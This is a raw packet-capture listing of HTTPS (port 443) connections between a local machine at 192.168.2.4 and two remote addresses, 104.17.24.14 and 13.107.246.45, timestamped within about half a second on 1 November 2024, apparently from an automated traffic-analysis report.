                                                                                        Nov 1, 2024 13:46:58.121395111 CET49877443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.121455908 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.121659994 CET49877443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.162667990 CET49877443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.162692070 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.163948059 CET49876443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.205631018 CET49877443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.260921001 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.260968924 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.260998964 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.261027098 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.261044979 CET49877443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.261060953 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.261090994 CET49877443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.261106014 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.261146069 CET49877443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.261153936 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.261523008 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.261564016 CET49877443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.261570930 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.262150049 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.262187004 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.262219906 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.262243032 CET49876443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.262253046 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.262274981 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.262300014 CET49876443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.262351990 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.262377977 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.262398958 CET49876443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.262399912 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.262413025 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.262451887 CET49876443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.266213894 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.266340017 CET49877443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.266346931 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.266921997 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.267085075 CET49876443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.314913034 CET49877443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.355158091 CET4434988113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.355612993 CET49881443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:58.355634928 CET4434988113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.356064081 CET49881443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:58.356070995 CET4434988113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.378015995 CET4434988013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.378468990 CET49880443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:58.378537893 CET4434988013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.378896952 CET49880443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:58.378915071 CET4434988013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.379554033 CET4434988213.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.379869938 CET49882443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:58.379900932 CET4434988213.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.380223989 CET49882443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:58.380234003 CET4434988213.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.380296946 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.380400896 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.380491018 CET49877443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.380501986 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.380574942 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.380616903 CET49877443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.380624056 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.381081104 CET4434988313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.381350994 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.381391048 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.381397963 CET49883443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:58.381417036 CET4434988313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.381428003 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.381438017 CET49877443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.381447077 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.381477118 CET49877443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.381747007 CET49883443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:58.381752968 CET4434988313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.381793976 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.381850958 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.381918907 CET49876443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.381932020 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.381966114 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.381995916 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.382008076 CET49876443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.382014990 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.382069111 CET49876443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.382349014 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.382385969 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.382411957 CET49877443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.382421017 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.382498026 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.382541895 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.382550001 CET49877443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.382559061 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.382574081 CET49877443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.382674932 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.383094072 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.383126020 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.383157015 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.383158922 CET49876443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.383167028 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.383198023 CET49876443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.383270979 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.383450985 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.383459091 CET49876443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.383482933 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.383491993 CET49877443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.383500099 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.383538961 CET49877443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.384103060 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.384154081 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.384229898 CET49876443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.384236097 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.384330034 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.384361029 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.384372950 CET49876443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.384380102 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.384418011 CET49876443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.384968042 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.389568090 CET4434987913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.389946938 CET49879443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:58.389981031 CET4434987913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.390333891 CET49879443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:58.390338898 CET4434987913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.427520037 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.431324959 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.431394100 CET49876443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.431421041 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.468215942 CET49877443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.468235016 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.478339911 CET49876443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.484842062 CET4434988113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.484966993 CET4434988113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.485012054 CET49881443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:58.485258102 CET49881443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:58.485276937 CET4434988113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.485285997 CET49881443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:58.485292912 CET4434988113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.492968082 CET49884443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:58.493021011 CET4434988413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.493096113 CET49884443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:58.493237972 CET49884443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:58.493252039 CET4434988413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.499423981 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.499466896 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.499488115 CET49877443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.499502897 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.499540091 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.499572039 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.499588966 CET49877443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.499599934 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.499613047 CET49877443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.499937057 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.499995947 CET49877443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.500004053 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.500365973 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.500411987 CET49877443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.500421047 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.500706911 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.500715971 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.500758886 CET49877443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.500767946 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.500778913 CET49877443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.500838995 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.500910997 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.500946999 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.500992060 CET49876443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.501005888 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.501049042 CET49876443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.501151085 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.501317978 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.501351118 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.501396894 CET49876443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.501405001 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.501493931 CET49876443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.501533985 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.501566887 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.501590014 CET49877443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.501599073 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.501610041 CET49877443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.501807928 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.501861095 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.501904964 CET49876443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.501912117 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.502171993 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.502229929 CET49876443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.502237082 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.502278090 CET49876443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.503015995 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.503068924 CET49876443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.503076077 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.503123045 CET49876443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.503751040 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.503806114 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.503818989 CET49876443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.503833055 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.503859043 CET49876443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.503875017 CET49876443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.504252911 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.504300117 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.504311085 CET49876443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.504333973 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.504364014 CET49876443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.504370928 CET49876443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.504477978 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.504513025 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.504537106 CET49876443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.504544020 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.504554033 CET49876443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.504587889 CET49876443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.506700039 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.506750107 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.506766081 CET49877443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.506778955 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.506791115 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.506793022 CET49877443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.506834030 CET49877443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.506836891 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.506848097 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.506882906 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.506882906 CET49877443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.506915092 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.506926060 CET49877443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.506934881 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.506958961 CET49877443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.507539034 CET4434988013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.507666111 CET4434988013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.507786989 CET49880443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:58.508011103 CET49880443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:58.508048058 CET4434988013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.508073092 CET49880443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:58.508088112 CET4434988013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.510601997 CET49885443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:58.510637999 CET4434988513.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.510694981 CET49885443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:58.510847092 CET49885443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:58.510860920 CET4434988513.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.514256001 CET4434988213.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.514281988 CET4434988213.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.514333010 CET4434988213.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.514369965 CET49882443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:58.514398098 CET49882443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:58.514527082 CET4434988313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.514554977 CET49882443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:58.514554977 CET49882443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:58.514570951 CET4434988213.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.514591932 CET4434988213.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.514750957 CET4434988313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.514816999 CET49883443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:58.514893055 CET49883443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:58.514903069 CET4434988313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.514910936 CET49883443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:58.514914036 CET4434988313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.517242908 CET49886443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:58.517256021 CET4434988613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.517319918 CET49886443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:58.517457008 CET49886443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:58.517463923 CET4434988613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.517771959 CET49887443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:58.517786980 CET4434988713.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.518023014 CET49887443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:58.518163919 CET49887443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:58.518176079 CET4434988713.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.546380043 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.546425104 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.546447992 CET49876443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.546458960 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.546469927 CET49876443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.546478033 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.546494007 CET49876443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.546520948 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.546521902 CET49877443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.546534061 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.546571970 CET49877443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.588396072 CET4434987913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.588619947 CET4434987913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.588675976 CET49879443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:58.588764906 CET49879443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:58.588785887 CET4434987913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.588798046 CET49879443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:58.588804007 CET4434987913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.592206001 CET49888443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:58.592247009 CET4434988813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.592349052 CET49888443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:58.592524052 CET49888443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:58.592540979 CET4434988813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.617526054 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.617594957 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.617600918 CET49877443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.617614031 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.617647886 CET49877443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.617659092 CET49877443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.618015051 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.618061066 CET49877443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.618419886 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.618455887 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.618478060 CET49877443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.618484974 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.618521929 CET49877443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.618535042 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.618599892 CET49877443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.618658066 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.618709087 CET49876443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.618875027 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.618927956 CET49876443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.619158983 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.619199991 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.619213104 CET49876443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.619220018 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.619245052 CET49876443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.619257927 CET49876443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.619534016 CET49877443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.619546890 CET44349877104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.619745970 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.619792938 CET49876443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.619961023 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.620006084 CET49876443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.620120049 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.620176077 CET49876443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.620548964 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.620578051 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.620601892 CET49876443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.620609045 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.620635033 CET49876443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.620861053 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.620909929 CET49876443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.620917082 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.620958090 CET49876443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.621243000 CET44349876104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:58.621289015 CET49876443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:58.621368885 CET44349876104.17.24.14192.168.2.4
